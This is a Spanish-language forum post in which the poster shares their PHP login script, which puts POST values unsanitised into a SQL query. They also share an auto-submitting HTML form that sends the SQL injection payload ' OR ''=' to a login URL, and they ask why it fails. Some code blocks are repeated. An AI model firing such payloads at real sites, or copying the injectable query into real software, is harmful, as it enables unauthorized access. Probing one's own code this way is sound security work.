Autor
Código:
<? include("../Connections/conn_ig.php");
echo $usuario = $HTTP_POST_VARS["usuario"];
echo $contrasena = $HTTP_POST_VARS["contrasena"];
$ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'";
$rs = mysql_query($ssql,$cosa);
$row=mysql_fetch_array($rs);
if (mysql_num_rows($rs)!=0){
//usuario y contraseña válidos and tipo='admin'
//defino una sesion y guardo datos
session_start();
session_register("autentificado");
$_SESSION["autentificado"]= "SI";
//panel.php tiene el panel de control
header("Location: panel.php");
}
?>
Tengo este codigo que autentifica al usuario que se conecta a la pagina... Que creo que es vulnerable a SQL Injection.echo $usuario = $HTTP_POST_VARS["usuario"];
echo $contrasena = $HTTP_POST_VARS["contrasena"];
$ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'";
$rs = mysql_query($ssql,$cosa);
$row=mysql_fetch_array($rs);
if (mysql_num_rows($rs)!=0){
//usuario y contraseña válidos and tipo='admin'
//defino una sesion y guardo datos
session_start();
session_register("autentificado");
$_SESSION["autentificado"]= "SI";
//panel.php tiene el panel de control
header("Location: panel.php");
}
?>
Realizo este codigo:
Código:
<body onload="document.forms[0].submit()">
<form action="http://www.pagina.com.ar/conectar.php" method="post">
<input type="text" Name="usuario" Value="admin">
<input type="text" Name="contrasena" Value="' OR ''='">
</form>
Pero no me funciona... Alguien me podria guiar?<form action="http://www.pagina.com.ar/conectar.php" method="post">
<input type="text" Name="usuario" Value="admin">
<input type="text" Name="contrasena" Value="' OR ''='">
</form>
En línea
- 
